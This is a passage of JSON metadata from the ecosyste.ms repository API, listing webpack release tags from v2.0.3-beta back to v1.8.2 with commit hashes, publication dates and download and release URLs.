0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https: